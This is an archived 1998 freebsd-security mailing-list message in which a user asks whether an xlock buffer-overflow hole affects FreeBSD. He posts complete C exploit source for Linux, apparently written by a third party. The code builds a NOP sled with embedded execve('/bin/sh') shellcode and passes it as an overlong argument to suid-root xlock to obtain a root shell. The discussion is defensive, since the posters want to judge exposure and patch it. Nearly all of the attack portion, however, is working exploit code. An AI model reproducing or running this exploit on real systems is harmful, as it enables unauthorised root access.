Date: Mon, 29 Jun 1998 10:17:18 +0200 From: Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE> To: Thomas Gellekum <tg@ihf.rwth-aachen.de> Cc: Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE>, freebsd-security@FreeBSD.ORG Subject: Re: xlock Message-ID: <19980629101718.52752@gil.physik.rwth-aachen.de> In-Reply-To: <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>; from Thomas Gellekum on Mon, Jun 29, 1998 at 09:29:47AM %2B0200 References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> <87btrcy9s5.fsf@ghpc6.ihf.rwth-aachen.de> <19980629092005.33214@gil.physik.rwth-aachen.de> <8790mgy8b8.fsf@ghpc6.ihf.rwth-aachen.de>
next in thread | previous in thread | raw e-mail | index | archive | help
On Mon, Jun 29, 1998 at 09:29:47AM +0200, Thomas Gellekum wrote:
> Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE> writes:
>
> > On Mon, Jun 29, 1998 at 08:58:02AM +0200, Thomas Gellekum wrote:
> > > Christoph Kukulies <kuku@gilberto.physik.RWTH-Aachen.DE> writes:
> > >
> > > > Alarmed by recent buffer overflow attacks on Linux machines in
> > > > my vicinity (an exploit for this is available) I thought about
> > > > xlock under FreeBSD and would like to know whether the
> > > > security hole has been sorted out under FreeBSD 2.2.x or what
> > > > measures are advised to prevent it.
> > >
> > > Could you tell more about this?
> >
> > /* x86 XLOCK overflow exploit
> > by cesaro@0wned.org 4/17/97
> >
> > Original exploit framework - lpr exploit
> >
> > Usage: make xlock-exploit
> > xlock-exploit <optional_offset>
> >
> > Assumptions: xlock is suid root, and installed in /usr/X11/bin
> > */
> >
> > [complete xploit can be sent on demand]
OK, here goes: (This is for Linux 2.x, xlock path and code on stack
may vary for FreeBSD if applicable).
--8<----------------------------------------------------------------------
/* x86 XLOCK overflow exploit
by cesaro@0wned.org 4/17/97
Original exploit framework - lpr exploit
Usage: make xlock-exploit
xlock-exploit <optional_offset>
Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
int main(int argc, char *argv[])
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int dfltOFFSET = DEFAULT_OFFSET;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
if (argc > 1)
dfltOFFSET = atoi(argv[1]);
else printf("You can specify another offset as a parameter if you
need...\n");
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + dfltOFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
--8<----------------------------------------------------------------------
>
> Please do. Desmond Bagley, the maintainer of xlockmore mentioned a
> security hole in Mesa with suid binaries. I don't know if it's the
> same problem.
>
> tg
--
Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19980629101718.52752>